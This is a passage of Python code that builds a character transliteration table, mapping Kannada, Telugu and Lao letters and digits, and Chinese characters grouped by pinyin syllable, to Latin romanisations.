u\"dd\"\n self.trans[u\"ಢ\"] = u\"ddh\"\n self.trans[u\"ಣ\"] = u\"nn\"\n self.trans[u\"ತ\"] = u\"t\"\n self.trans[u\"ಥ\"] = u\"th\"\n self.trans[u\"ದ\"] = u\"d\"\n self.trans[u\"ಧ\"] = u\"dh\"\n self.trans[u\"ನ\"] = u\"n\"\n self.trans[u\"ಪ\"] = u\"p\"\n self.trans[u\"ಫ\"] = u\"ph\"\n self.trans[u\"ಬ\"] = u\"b\"\n self.trans[u\"ಭ\"] = u\"bh\"\n self.trans[u\"ಮ\"] = u\"m\"\n self.trans[u\"ಯ\"] = u\"y\"\n self.trans[u\"ರ\"] = u\"r\"\n self.trans[u\"ಲ\"] = u\"l\"\n self.trans[u\"ವ\"] = u\"v\"\n self.trans[u\"ಶ\"] = u\"sh\"\n self.trans[u\"ಷ\"] = u\"ss\"\n self.trans[u\"ಸ\"] = 
u\"s\"\n self.trans[u\"ಹ\"] = u\"h\"\n self.trans[u\"ಳ\"] = u\"ll\"\n self.trans[u\"೦\"] = u\"0\"\n self.trans[u\"೧\"] = u\"1\"\n self.trans[u\"೨\"] = u\"2\"\n self.trans[u\"೩\"] = u\"3\"\n self.trans[u\"೪\"] = u\"4\"\n self.trans[u\"೫\"] = u\"5\"\n self.trans[u\"೬\"] = u\"6\"\n self.trans[u\"೭\"] = u\"7\"\n self.trans[u\"೮\"] = u\"8\"\n self.trans[u\"೯\"] = u\"9\"\n # Telugu\n self.trans['అ'] = 'a'\n for char in u\"ఆా\":\n self.trans[char] = u\"aa\"\n for char in u\"ఇి\":\n self.trans[char] = u\"i\"\n for char in u\"ఈీ\":\n self.trans[char] = u\"ii\"\n for char in u\"ఉు\":\n self.trans[char] = u\"u\"\n for char in u\"ఊూ\":\n self.trans[char] = u\"uu\"\n for char in u\"ఋృ\":\n self.trans[char] = u\"r'\"\n for char in u\"ౠౄ\":\n self.trans[char] = u'r\"'\n self.trans[u\"ఌ\"] = u\"l'\"\n self.trans[u\"ౡ\"] = u'l\"'\n for char in u\"ఎె\":\n self.trans[char] = u\"e\"\n for char in u\"ఏే\":\n self.trans[char] = u\"ee\"\n for char in u\"ఐై\":\n self.trans[char] = u\"ai\"\n for char in u\"ఒొ\":\n self.trans[char] = u\"o\"\n for char in u\"ఓో\":\n self.trans[char] = u\"oo\"\n for char in u\"ఔౌ\":\n self.trans[char] = u\"au\"\n self.trans[u\"ం\"] = u\"'\"\n self.trans[u\"ః\"] = u'\"'\n self.trans[u\"క\"] = u\"k\"\n self.trans[u\"ఖ\"] = u\"kh\"\n self.trans[u\"గ\"] = u\"g\"\n self.trans[u\"ఘ\"] = u\"gh\"\n self.trans[u\"ఙ\"] = u\"ng\"\n self.trans[u\"చ\"] = u\"ts\"\n self.trans[u\"ఛ\"] = u\"tsh\"\n self.trans[u\"జ\"] = u\"j\"\n self.trans[u\"ఝ\"] = u\"jh\"\n self.trans[u\"ఞ\"] = u\"ñ\"\n for char in u\"టత\":\n self.trans[char] = u\"t\"\n for char in u\"ఠథ\":\n self.trans[char] = u\"th\"\n for char in u\"డద\":\n self.trans[char] = u\"d\"\n for char in u\"ఢధ\":\n self.trans[char] = u\"dh\"\n for char in u\"ణన\":\n self.trans[char] = u\"n\"\n self.trans[u\"ప\"] = u\"p\"\n self.trans[u\"ఫ\"] = u\"ph\"\n self.trans[u\"బ\"] = u\"b\"\n self.trans[u\"భ\"] = u\"bh\"\n self.trans[u\"మ\"] = u\"m\"\n self.trans[u\"య\"] = u\"y\"\n for char in u\"రఱ\":\n self.trans[char] = u\"r\"\n for char in u\"లళ\":\n self.trans[char] = u\"l\"\n self.trans[u\"వ\"] = u\"v\"\n self.trans[u\"శ\"] = u\"sh\"\n for char in u\"షస\":\n self.trans[char] = u\"s\"\n self.trans[u\"హ\"] = u\"h\"\n self.trans[u\"్\"] = \"\"\n for char in u\"ంఁ\":\n self.trans[char] = u\"^\"\n self.trans[u\"ః\"] = u\"-\"\n self.trans[u\"౦\"] = u\"0\"\n self.trans[u\"౧\"] = u\"1\"\n self.trans[u\"౨\"] = u\"2\"\n self.trans[u\"౩\"] = u\"3\"\n self.trans[u\"౪\"] = u\"4\"\n self.trans[u\"౫\"] = u\"5\"\n self.trans[u\"౬\"] = u\"6\"\n self.trans[u\"౭\"] = u\"7\"\n self.trans[u\"౮\"] = u\"8\"\n self.trans[u\"౯\"] = u\"9\"\n self.trans[u\"౹\"] = u\"1/4\"\n self.trans[u\"౺\"] = u\"1/2\"\n self.trans[u\"౻\"] = u\"3/4\"\n self.trans[u\"౼\"] = u\"1/16\"\n self.trans[u\"౽\"] = u\"1/8\"\n self.trans[u\"౾\"] = u\"3/16\"\n # Lao - note: pronounciation in initial position is used;\n # different pronounciation in final position is ignored\n self.trans[u\"ກ\"] = \"k\"\n for char in u\"ຂຄ\":\n self.trans[char] = \"kh\"\n self.trans[u\"ງ\"] = \"ng\"\n self.trans[u\"ຈ\"] = \"ch\"\n for char in u\"ສຊ\":\n self.trans[char] = \"s\"\n self.trans[u\"ຍ\"] = \"ny\"\n self.trans[u\"ດ\"] = \"d\"\n self.trans[u\"ຕ\"] = \"t\"\n for char in u\"ຖທ\":\n self.trans[char] = \"th\"\n self.trans[u\"ນ\"] = \"n\"\n self.trans[u\"ບ\"] = \"b\"\n self.trans[u\"ປ\"] = \"p\"\n for char in u\"ຜພ\":\n self.trans[char] = \"ph\"\n for char in u\"ຝຟ\":\n self.trans[char] = \"f\"\n for char in u\"ມໝ\":\n self.trans[char] = \"m\"\n self.trans[u\"ຢ\"] = \"y\"\n for char in u\"ຣຼ\":\n self.trans[char] = \"r\"\n 
for char in u\"ລຼ\":\n self.trans[char] = \"l\"\n self.trans[u\"ວ\"] = \"v\"\n self.trans['ຮ'] = 'h'\n self.trans[u\"ອ\"] = \"'\"\n for char in u\"ະັ\":\n self.trans[char] = \"a\"\n self.trans[u\"ິ\"] = \"i\"\n self.trans[u\"ຶ\"] = \"ue\"\n self.trans[u\"ຸ\"] = \"u\"\n self.trans[u\"ເ\"] = u\"é\"\n self.trans[u\"ແ\"] = u\"è\"\n for char in u\"ໂົາໍ\":\n self.trans[char] = \"o\"\n self.trans[u\"ຽ\"] = \"ia\"\n self.trans[u\"ເຶ\"] = \"uea\"\n self.trans[u\"ຍ\"] = \"i\"\n for char in u\"ໄໃ\":\n self.trans[char] = \"ai\"\n self.trans[u\"ຳ\"] = \"am\"\n self.trans[u\"າ\"] = \"aa\"\n self.trans[u\"ີ\"] = \"ii\"\n self.trans[u\"ື\"] = \"yy\"\n self.trans[u\"ູ\"] = \"uu\"\n self.trans[u\"ເ\"] = \"e\"\n self.trans[u\"ແ\"] = \"ei\"\n self.trans[u\"໐\"] = \"0\"\n self.trans[u\"໑\"] = \"1\"\n self.trans[u\"໒\"] = \"2\"\n self.trans[u\"໓\"] = \"3\"\n self.trans[u\"໔\"] = \"4\"\n self.trans[u\"໕\"] = \"5\"\n self.trans[u\"໖\"] = \"6\"\n self.trans[u\"໗\"] = \"7\"\n self.trans[u\"໘\"] = \"8\"\n self.trans[u\"໙\"] = \"9\"\n # Chinese -- note: incomplete\n for char in u\"埃挨哎唉哀皑癌蔼矮艾碍爱隘\":\n self.trans[char] = u\"ai\"\n for char in u\"鞍氨安俺按暗岸胺案\":\n self.trans[char] = u\"an\"\n for char in u\"肮昂盎\":\n self.trans[char] = u\"ang\"\n for char in u\"凹敖熬翱袄傲奥懊澳\":\n self.trans[char] = u\"ao\"\n for char in u\"芭捌扒叭吧笆八疤巴拔跋靶把耙坝霸罢爸\":\n self.trans[char] = u\"ba\"\n for char in u\"白柏百摆佰败拜稗\":\n self.trans[char] = u\"bai\"\n for char in u\"斑班搬扳般颁板版扮拌伴瓣半办绊\":\n self.trans[char] = u\"ban\"\n for char in u\"邦帮梆榜膀绑棒磅蚌镑傍谤\":\n self.trans[char] = u\"bang\"\n for char in u\"苞胞包褒剥薄雹保堡饱宝抱报暴豹鲍爆\":\n self.trans[char] = u\"bao\"\n for char in u\"杯碑悲卑北辈背贝钡倍狈备惫焙被\":\n self.trans[char] = u\"bei\"\n for char in u\"奔苯本笨\":\n self.trans[char] = u\"ben\"\n for char in u\"崩绷甭泵蹦迸\":\n self.trans[char] = u\"beng\"\n for char in u\"逼鼻比鄙笔彼碧蓖蔽毕毙毖币庇痹闭敝弊必辟壁臂避陛\":\n self.trans[char] = u\"bi\"\n for char in u\"鞭边编贬扁便变卞辨辩辫遍\":\n self.trans[char] = u\"bian\"\n for char in u\"标彪膘表\":\n self.trans[char] = u\"biao\"\n for char in u\"鳖憋别瘪\":\n self.trans[char] = u\"bie\"\n for char in u\"彬斌濒滨宾摈\":\n self.trans[char] = u\"bin\"\n for char in u\"兵冰柄丙秉饼炳病并\":\n self.trans[char] = u\"bing\"\n for char in u\"玻菠播拨钵波博勃搏铂箔伯帛舶脖膊渤泊驳捕卜亳\":\n self.trans[char] = u\"bo\"\n for char in u\"哺补埠不布步簿部怖\":\n self.trans[char] = u\"bu\"\n for char in u\"猜裁材才财睬踩采彩菜蔡\":\n self.trans[char] = u\"cai\"\n for char in u\"餐参蚕残惭惨灿\":\n self.trans[char] = u\"can\"\n for char in u\"苍舱仓沧藏\":\n self.trans[char] = u\"cang\"\n for char in u\"操糙槽曹草\":\n self.trans[char] = u\"cao\"\n for char in u\"厕策侧册测\":\n self.trans[char] = u\"ce\"\n for char in u\"层蹭\":\n self.trans[char] = u\"ceng\"\n for char in u\"插叉茬茶查碴搽察岔差诧\":\n self.trans[char] = u\"cha\"\n for char in u\"拆柴豺\":\n self.trans[char] = u\"chai\"\n for char in u\"搀掺蝉馋谗缠铲产阐颤\":\n self.trans[char] = u\"chan\"\n for char in u\"昌猖场尝常长偿肠厂敞畅唱倡\":\n self.trans[char] = u\"chang\"\n for char in u\"超抄钞朝嘲潮巢吵炒\":\n self.trans[char] = u\"chao\"\n for char in u\"车扯撤掣彻澈\":\n self.trans[char] = u\"che\"\n for char in u\"郴臣辰尘晨忱沉陈趁衬\":\n self.trans[char] = u\"chen\"\n for char in u\"撑称城橙成呈乘程惩澄诚承逞骋秤\":\n self.trans[char] = u\"cheng\"\n for char in u\"吃痴持匙池迟弛驰耻齿侈尺赤翅斥炽\":\n self.trans[char] = u\"chi\"\n for char in u\"充冲虫崇宠\":\n self.trans[char] = u\"chong\"\n for char in u\"抽酬畴踌稠愁筹仇绸瞅丑臭\":\n self.trans[char] = u\"chou\"\n for char in u\"初出橱厨躇锄雏滁除楚储矗搐触处\":\n self.trans[char] = u\"chu\"\n self.trans['揣'] = 'chuai'\n for char in u\"川穿椽传船喘串\":\n self.trans[char] = u\"chuan\"\n for char in u\"疮窗幢床闯创\":\n self.trans[char] = u\"chuang\"\n for char in 
u\"吹炊捶锤垂\":\n self.trans[char] = u\"chui\"\n for char in u\"春椿醇唇淳纯蠢\":\n self.trans[char] = u\"chun\"\n for char in u\"戳绰\":\n self.trans[char] = u\"chuo\"\n for char in u\"疵茨磁雌辞慈瓷词此刺赐次\":\n self.trans[char] = u\"ci\"\n for char in u\"聪葱囱匆从丛\":\n self.trans[char] = u\"cong\"\n self.trans['凑'] = 'cou'\n for char in u\"粗醋簇促\":\n self.trans[char] = u\"cu\"\n for char in u\"蹿篡窜\":\n self.trans[char] = u\"cuan\"\n for char in u\"摧崔催脆瘁粹淬翠\":\n self.trans[char] = u\"cui\"\n for char in u\"村存寸\":\n self.trans[char] = u\"cun\"\n for char in u\"磋撮搓措挫错\":\n self.trans[char] = u\"cuo\"\n for char in u\"搭达答瘩打大\":\n self.trans[char] = u\"da\"\n for char in u\"呆歹傣戴带殆代贷袋待逮怠\":\n self.trans[char] = u\"dai\"\n for char in u\"耽担丹单郸掸胆旦氮但惮淡诞弹蛋儋\":\n self.trans[char] = u\"dan\"\n for char in u\"当挡党荡档\":\n self.trans[char] = u\"dang\"\n for char in u\"刀捣蹈倒岛祷导到稻悼道盗\":\n self.trans[char] = u\"dao\"\n for char in u\"德得的\":\n self.trans[char] = u\"de\"\n for char in u\"蹬灯登等瞪凳邓\":\n self.trans[char] = u\"deng\"\n for char in u\"堤低滴迪敌笛狄涤翟嫡抵底地蒂第帝弟递缔\":\n self.trans[char] = u\"di\"\n for char in u\"颠掂滇碘点典靛垫电佃甸店惦奠淀殿\":\n self.trans[char] = u\"dian\"\n for char in u\"碉叼雕凋刁掉吊钓调\":\n self.trans[char] = u\"diao\"\n for char in u\"跌爹碟蝶迭谍叠\":\n self.trans[char] = u\"die\"\n for char in u\"丁盯叮钉顶鼎锭定订\":\n self.trans[char] = u\"ding\"\n self.trans['丢'] = 'diu'\n for char in u\"东冬董懂动栋侗恫冻洞\":\n self.trans[char] = u\"dong\"\n for char in u\"兜抖斗陡豆逗痘\":\n self.trans[char] = u\"dou\"\n for char in u\"都督毒犊独读堵睹赌杜镀肚度渡妒\":\n self.trans[char] = u\"du\"\n for char in u\"端短锻段断缎\":\n self.trans[char] = u\"duan\"\n for char in u\"堆兑队对\":\n self.trans[char] = u\"dui\"\n for char in u\"墩吨蹲敦顿囤钝盾遁\":\n self.trans[char] = u\"dun\"\n for char in u\"掇哆多夺垛躲朵跺舵剁惰堕\":\n self.trans[char] = u\"duo\"\n for char in u\"蛾峨鹅俄额讹娥恶厄扼遏鄂饿\":\n self.trans[char] = u\"e\"\n for char in u\"恩嗯\":\n self.trans[char] = u\"en\"\n for char in u\"而儿耳尔饵洱二贰\":\n self.trans[char] = u\"er\"\n for char in u\"发罚筏伐乏阀法珐\":\n self.trans[char] = u\"fa\"\n for char in u\"藩帆番翻樊矾钒繁凡烦反返范贩犯饭泛\":\n self.trans[char] = u\"fan\"\n for char in u\"坊芳方肪房防妨仿访纺放\":\n self.trans[char] = u\"fang\"\n for char in u\"菲非啡飞肥匪诽吠肺废沸费\":\n self.trans[char] = u\"fei\"\n for char in u\"芬酚吩氛分纷坟焚汾粉奋份忿愤粪\":\n self.trans[char] = u\"fen\"\n for char in u\"丰封枫蜂峰锋风疯烽逢冯缝讽奉凤\":\n self.trans[char] = u\"feng\"\n self.trans['佛'] = 'fo'\n self.trans['否'] = 'fou'\n for char in u\"夫敷肤孵扶拂辐幅氟符伏俘服浮涪福袱弗甫抚辅俯釜斧脯腑府腐赴副覆赋复傅付阜父腹负富讣附妇缚咐\":\n self.trans[char] = u\"fu\"\n for char in u\"噶嘎\":\n self.trans[char] = u\"ga\"\n for char in u\"该改概钙盖溉\":\n self.trans[char] = u\"gai\"\n for char in u\"干甘杆柑竿肝赶感秆敢赣\":\n self.trans[char] = u\"gan\"\n for char in u\"冈刚钢缸肛纲岗港杠\":\n self.trans[char] = u\"gang\"\n for char in u\"篙皋高膏羔糕搞镐稿告\":\n self.trans[char] = u\"gao\"\n for char in u\"哥歌搁戈鸽胳疙割革葛格蛤阁隔铬个各\":\n self.trans[char] = u\"ge\"\n self.trans['给'] = 'gei'\n for char in u\"根跟\":\n self.trans[char] = u\"gen\"\n for char in u\"耕更庚羹埂耿梗\":\n self.trans[char] = u\"geng\"\n for char in u\"工攻功恭龚供躬公宫弓巩汞拱贡共\":\n self.trans[char] = u\"gong\"\n for char in u\"钩勾沟苟狗垢构购够\":\n self.trans[char] = u\"gou\"\n for char in u\"辜菇咕箍估沽孤姑鼓古蛊骨谷股故顾固雇\":\n self.trans[char] = u\"gu\"\n for char in u\"刮瓜剐寡挂褂\":\n self.trans[char] = u\"gua\"\n for char in u\"乖拐怪\":\n self.trans[char] = u\"guai\"\n for char in u\"棺关官冠观管馆罐惯灌贯\":\n self.trans[char] = u\"guan\"\n for char in u\"光广逛\":\n self.trans[char] = u\"guang\"\n for char in u\"瑰规圭硅归龟闺轨鬼诡癸桂柜跪贵刽\":\n self.trans[char] = u\"gui\"\n for char in u\"辊滚棍\":\n self.trans[char] = u\"gun\"\n for char in u\"锅郭国果裹过\":\n 
self.trans[char] = u\"guo\"\n self.trans['哈'] = 'ha'\n for char in u\"骸孩海氦亥害骇\":\n self.trans[char] = u\"hai\"\n for char in u\"酣憨邯韩含涵寒函喊罕翰撼捍旱憾悍焊汗汉\":\n self.trans[char] = u\"han\"\n for char in u\"夯杭航\":\n self.trans[char] = u\"hang\"\n for char in u\"壕嚎豪毫郝好耗号浩\":\n self.trans[char] = u\"hao\"\n for char in u\"呵喝荷菏核禾和何合盒貉阂河涸赫褐鹤贺\":\n self.trans[char] = u\"he\"\n for char in u\"嘿黑\":\n self.trans[char] = u\"hei\"\n for char in u\"痕很狠恨\":\n self.trans[char] = u\"hen\"\n for char in u\"哼亨横衡恒\":\n self.trans[char] = u\"heng\"\n for char in u\"轰哄烘虹鸿洪宏弘红\":\n self.trans[char] = u\"hong\"\n for char in u\"喉侯猴吼厚候后\":\n self.trans[char] = u\"hou\"\n for char in u\"呼乎忽瑚壶葫胡蝴狐糊湖弧虎唬护互沪户\":\n self.trans[char] = u\"hu\"\n for char in u\"花哗华猾滑画划化话\":\n self.trans[char] = u\"hua\"\n for char in u\"槐徊怀淮坏\":\n self.trans[char] = u\"huai\"\n for char in u\"欢环桓还缓换患唤痪豢焕涣宦幻\":\n self.trans[char] = u\"huan\"\n for char in u\"荒慌黄磺蝗簧皇凰惶煌晃幌恍谎\":\n self.trans[char] = u\"huang\"\n for char in u\"灰挥辉徽恢蛔回毁悔慧卉惠晦贿秽会烩汇讳诲绘\":\n self.trans[char] = u\"hui\"\n for char in u\"荤昏婚魂浑混\":\n self.trans[char] = u\"hun\"\n for char in u\"豁活伙火获或惑霍货祸\":\n self.trans[char] = u\"huo\"\n for char in u\"击圾基机畸稽积箕肌饥迹激讥鸡姬绩缉吉极棘辑籍集及急疾汲即嫉级挤几脊己蓟技冀季伎祭剂悸济寄寂计记既忌际妓继纪\":\n self.trans[char] = u\"ji\"\n for char in u\"嘉枷夹佳家加荚颊贾甲钾假稼价架驾嫁\":\n self.trans[char] = u\"jia\"\n for char in u\"歼监坚尖笺间煎兼肩艰奸缄茧检柬碱硷拣捡简俭剪减荐槛鉴践贱见键箭件健舰剑饯渐溅涧建\":\n self.trans[char] = u\"jian\"\n for char in u\"僵姜将浆江疆蒋桨奖讲匠酱降\":\n self.trans[char] = u\"jiang\"\n for char in u\"蕉椒礁焦胶交郊浇骄娇嚼搅铰矫侥脚狡角饺缴绞剿教酵轿较叫窖\":\n self.trans[char] = u\"jiao\"\n for char in u\"揭接皆秸街阶截劫节桔杰捷睫竭洁结解姐戒藉芥界借介疥诫届\":\n self.trans[char] = u\"jie\"\n for char in u\"巾筋斤金今津襟紧锦仅谨进靳晋禁近烬浸尽劲\":\n self.trans[char] = u\"jin\"\n for char in u\"荆兢茎睛晶鲸京惊精粳经井警景颈静境敬镜径痉靖竟竞净\":\n self.trans[char] = u\"jing\"\n for char in u\"囧炯窘\":\n self.trans[char] = u\"jiong\"\n for char in u\"揪究纠玖韭久灸九酒厩救旧臼舅咎就疚\":\n self.trans[char] = u\"jiu\"\n for char in u\"鞠拘狙疽居驹菊局咀矩举沮聚拒据巨具距踞锯俱句惧炬剧\":\n self.trans[char] = u\"ju\"\n for char in u\"捐鹃娟倦眷卷绢\":\n self.trans[char] = u\"juan\"\n for char in u\"撅攫抉掘倔爵觉决诀绝\":\n self.trans[char] = u\"jue\"\n for char in u\"均菌钧军君峻俊竣浚郡骏\":\n self.trans[char] = u\"jun\"\n for char in u\"喀咖卡咯\":\n self.trans[char] = u\"ka\"\n for char in u\"开揩楷凯慨\":\n self.trans[char] = u\"kai\"\n for char in u\"刊堪勘坎砍看\":\n self.trans[char] = u\"kan\"\n for char in u\"康慷糠扛抗亢炕\":\n self.trans[char] = u\"kang\"\n for char in u\"考拷烤靠\":\n self.trans[char] = u\"kao\"\n for char in u\"坷苛柯棵磕颗科壳咳可渴克刻客课\":\n self.trans[char] = u\"ke\"\n for char in u\"肯啃垦恳\":\n self.trans[char] = u\"ken\"\n for char in u\"坑吭\":\n self.trans[char] = u\"keng\"\n for char in u\"空恐孔控\":\n self.trans[char] = u\"kong\"\n for char in u\"抠口扣寇\":\n self.trans[char] = u\"kou\"\n for char in u\"枯哭窟苦酷库裤\":\n self.trans[char] = u\"ku\"\n for char in u\"夸垮挎跨胯\":\n self.trans[char] = u\"kua\"\n for char in u\"块筷侩快\":\n self.trans[char] = u\"kuai\"\n for char in u\"宽款\":\n self.trans[char] = u\"kuan\"\n for char in u\"匡筐狂框矿眶旷况\":\n self.trans[char] = u\"kuang\"\n for char in u\"亏盔岿窥葵奎魁傀馈愧溃\":\n self.trans[char] = u\"kui\"\n for char in u\"坤昆捆困\":\n self.trans[char] = u\"kun\"\n for char in u\"括扩廓阔\":\n self.trans[char] = u\"kuo\"\n for char in u\"垃拉喇蜡腊辣啦\":\n self.trans[char] = u\"la\"\n for char in u\"莱来赖\":\n self.trans[char] = u\"lai\"\n for char in u\"蓝婪栏拦篮阑兰澜谰揽览懒缆烂滥\":\n self.trans[char] = u\"lan\"\n for char in u\"琅榔狼廊郎朗浪\":\n self.trans[char] = u\"lang\"\n for char in u\"捞劳牢老佬姥酪烙涝\":\n self.trans[char] = u\"lao\"\n for char in u\"勒乐\":\n self.trans[char] = u\"le\"\n for char 
in u\"雷镭蕾磊累儡垒擂肋类泪\":\n self.trans[char] = u\"lei\"\n for char in u\"棱楞冷\":\n self.trans[char] = u\"leng\"\n for char in u\"厘梨犁黎篱狸离漓理李里鲤礼莉荔吏栗丽厉励砾历利傈例俐痢立粒沥隶力璃哩\":\n self.trans[char] = u\"li\"\n self.trans['俩'] = 'lia'\n for char in u\"联莲连镰廉怜涟帘敛脸链恋炼练\":\n self.trans[char] = u\"lian\"\n for char in u\"粮凉梁粱良两辆量晾亮谅\":\n self.trans[char] = u\"liang\"\n for char in u\"撩聊僚疗燎寥辽潦了撂镣廖料\":\n self.trans[char] = u\"liao\"\n for char in u\"列裂烈劣猎\":\n self.trans[char] = u\"lie\"\n for char in u\"琳林磷霖临邻鳞淋凛赁吝拎\":\n self.trans[char] = u\"lin\"\n for char in u\"玲菱零龄铃伶羚凌灵陵岭领另令\":\n self.trans[char] = u\"ling\"\n for char in u\"溜琉榴硫馏留刘瘤流柳六\":\n self.trans[char] = u\"liu\"\n for char in u\"龙聋咙笼窿隆垄拢陇\":\n self.trans[char] = u\"long\"\n for char in u\"楼娄搂篓漏陋\":\n self.trans[char] = u\"lou\"\n for char in u\"芦卢颅庐炉掳卤虏鲁麓碌露路赂鹿潞禄录陆戮泸\":\n self.trans[char] = u\"lu\"\n for char in u\"峦挛孪滦卵乱\":\n self.trans[char] = u\"luan\"\n for char in u\"掠略\":\n self.trans[char] = u\"lue\"\n for char in u\"抡轮伦仑沦纶论\":\n self.trans[char] = u\"lun\"\n for char in u\"萝螺罗逻锣箩骡裸落洛骆络漯\":\n self.trans[char] = u\"luo\"\n for char in u\"驴吕铝侣旅履屡缕虑氯律率滤绿\":\n self.trans[char] = u\"lv\"\n for char in u\"妈麻玛码蚂马骂嘛吗\":\n self.trans[char] = u\"ma\"\n for char in u\"埋买麦卖迈脉\":\n self.trans[char] = u\"mai\"\n for char in u\"瞒馒蛮满蔓曼慢漫谩\":\n self.trans[char] = u\"man\"\n for char in u\"芒茫盲氓忙莽\":\n self.trans[char] = u\"mang\"\n for char in u\"猫茅锚毛矛铆卯茂冒帽貌贸\":\n self.trans[char] = u\"mao\"\n self.trans['么'] = 'me'\n for char in u\"玫枚梅酶霉煤没眉媒镁每美昧寐妹媚\":\n self.trans[char] = u\"mei\"\n for char in u\"门闷们\":\n self.trans[char] = u\"men\"\n for char in u\"萌蒙檬盟锰猛梦孟\":\n self.trans[char] = u\"meng\"\n for char in u\"眯醚靡糜迷谜弥米秘觅泌蜜密幂\":\n self.trans[char] = u\"mi\"\n for char in u\"棉眠绵冕免勉娩缅面\":\n self.trans[char] = u\"mian\"\n for char in u\"苗描瞄藐秒渺庙妙\":\n self.trans[char] = u\"miao\"\n for char in u\"蔑灭\":\n self.trans[char] = u\"mie\"\n for char in u\"民抿皿敏悯闽\":\n self.trans[char] = u\"min\"\n for char in u\"明螟鸣铭名命\":\n self.trans[char] = u\"ming\"\n self.trans['谬'] = 'miu'\n for char in u\"摸摹蘑模膜磨摩魔抹末莫墨默沫漠寞陌\":\n self.trans[char] = u\"mo\"\n for char in u\"谋牟某\":\n self.trans[char] = u\"mou\"\n for char in u\"拇牡亩姆母墓暮幕募慕木目睦牧穆\":\n self.trans[char] = u\"mu\"\n for char in u\"拿哪呐钠那娜纳\":\n self.trans[char] = u\"na\"\n for char in u\"氖乃奶耐奈\":\n self.trans[char] = u\"nai\"\n for char in u\"南男难\":\n self.trans[char] = u\"nan\"\n self.trans['囊'] = 'nang'\n for char in u\"挠脑恼闹淖\":\n self.trans[char] = u\"nao\"\n self.trans['呢'] = 'ne'\n for char in u\"馁内\":\n self.trans[char] = u\"nei\"\n self.trans['嫩'] = 'nen'\n self.trans['能'] = 'neng'\n for char in u\"妮霓倪泥尼拟你匿腻逆溺\":\n self.trans[char] = u\"ni\"\n for char in u\"蔫拈年碾撵捻念\":\n self.trans[char] = u\"nian\"\n for char in u\"娘酿\":\n self.trans[char] = u\"niang\"\n for char in u\"鸟尿\":\n self.trans[char] = u\"niao\"\n for char in u\"捏聂孽啮镊镍涅\":\n self.trans[char] = u\"nie\"\n self.trans['您'] = 'nin'\n for char in u\"柠狞凝宁拧泞\":\n self.trans[char] = u\"ning\"\n for char in u\"牛扭钮纽\":\n self.trans[char] = u\"niu\"\n for char in u\"脓浓农弄\":\n self.trans[char] = u\"nong\"\n for char in u\"奴努怒\":\n self.trans[char] = u\"nu\"\n self.trans['暖'] = 'nuan'\n for char in u\"虐疟\":\n self.trans[char] = u\"nue\"\n for char in u\"挪懦糯诺\":\n self.trans[char] = u\"nuo\"\n self.trans['女'] = 'nv'\n self.trans['哦'] = 'o'\n for char in u\"欧鸥殴藕呕偶沤\":\n self.trans[char] = u\"ou\"\n for char in u\"啪趴爬帕怕琶\":\n self.trans[char] = u\"pa\"\n for char in u\"拍排牌徘湃派\":\n self.trans[char] = u\"pai\"\n for char in u\"攀潘盘磐盼畔判叛\":\n self.trans[char] = u\"pan\"\n for char in 
u\"乓庞旁耪胖\":\n self.trans[char] = u\"pang\"\n for char in u\"抛咆刨炮袍跑泡\":\n self.trans[char] = u\"pao\"\n for char in u\"呸胚培裴赔陪配佩沛\":\n self.trans[char] = u\"pei\"\n for char in u\"喷盆\":\n self.trans[char] = u\"pen\"\n for char in u\"砰抨烹澎彭蓬棚硼篷膨朋鹏捧碰\":\n self.trans[char] = u\"peng\"\n for char in u\"坯砒霹批披劈琵毗啤脾疲皮匹痞僻屁譬\":\n self.trans[char] = u\"pi\"\n for char in u\"篇偏片骗\":\n self.trans[char] = u\"pian\"\n for char in u\"飘漂瓢票\":\n self.trans[char] = u\"piao\"\n for char in u\"撇瞥\":\n self.trans[char] = u\"pie\"\n for char in u\"拼频贫品聘\":\n self.trans[char] = u\"pin\"\n for char in u\"乒坪苹萍平凭瓶评屏\":\n self.trans[char] = u\"ping\"\n for char in u\"坡泼颇婆破魄迫粕剖\":\n self.trans[char] = u\"po\"\n for char in u\"扑铺仆莆葡菩蒲埔朴圃普浦谱曝瀑濮\":\n self.trans[char] = u\"pu\"\n for char in u\"期欺栖戚妻七凄漆柒沏其棋奇歧畦崎脐齐旗祈祁骑起岂乞企启契砌器气迄弃汽泣讫\":\n self.trans[char] = u\"qi\"\n for char in u\"掐恰洽\":\n self.trans[char] = u\"qia\"\n for char in u\"牵扦钎铅千迁签仟谦乾黔钱钳前潜遣浅谴堑嵌欠歉\":\n self.trans[char] = u\"qian\"\n for char in u\"枪呛腔羌墙蔷强抢\":\n self.trans[char] = u\"qiang\"\n for char in u\"橇锹敲悄桥瞧乔侨巧鞘撬翘峭俏窍\":\n self.trans[char] = u\"qiao\"\n for char in u\"切茄且怯窃\":\n self.trans[char] = u\"qie\"\n for char in u\"钦侵亲秦琴勤芹擒禽寝沁\":\n self.trans[char] = u\"qin\"\n for char in u\"青轻氢倾卿清擎晴氰情顷请庆\":\n self.trans[char] = u\"qing\"\n for char in u\"琼穷\":\n self.trans[char] = u\"qiong\"\n for char in u\"秋丘邱球求囚酋泅\":\n self.trans[char] = u\"qiu\"\n for char in u\"趋区蛆曲躯屈驱渠取娶龋趣去\":\n self.trans[char] = u\"qu\"\n for char in u\"圈颧权醛泉全痊拳犬券劝\":\n self.trans[char] = u\"quan\"\n for char in u\"缺炔瘸却鹊榷确雀\":\n self.trans[char] = u\"que\"\n for char in u\"裙群\":\n self.trans[char] = u\"qun\"\n for char in u\"然燃冉染\":\n self.trans[char] = u\"ran\"\n for char in u\"瓤壤攘嚷让\":\n self.trans[char] = u\"rang\"\n for char in u\"饶扰绕\":\n self.trans[char] = u\"rao\"\n for char in u\"惹热\":\n self.trans[char] = u\"re\"\n for char in u\"壬仁人忍韧任认刃妊纫\":\n self.trans[char] = u\"ren\"\n for char in u\"扔仍\":\n self.trans[char] = u\"reng\"\n self.trans['日'] = 'ri'\n for char in u\"戎茸蓉荣融熔溶容绒冗\":\n self.trans[char] = u\"rong\"\n for char in u\"揉柔肉\":\n self.trans[char] = u\"rou\"\n for char in u\"茹蠕儒孺如辱乳汝入褥\":\n self.trans[char] = u\"ru\"\n for char in u\"软阮\":\n self.trans[char] = u\"ruan\"\n for char in u\"蕊瑞锐\":\n self.trans[char] = u\"rui\"\n for char in u\"闰润\":\n self.trans[char] = u\"run\"\n for char in u\"若弱\":\n self.trans[char] = u\"ruo\"\n for char in u\"撒洒萨\":\n self.trans[char] = u\"sa\"\n for char in u\"腮鳃塞赛\":\n self.trans[char] = u\"sai\"\n for char in u\"三叁伞散\":\n self.trans[char] = u\"san\"\n for char in 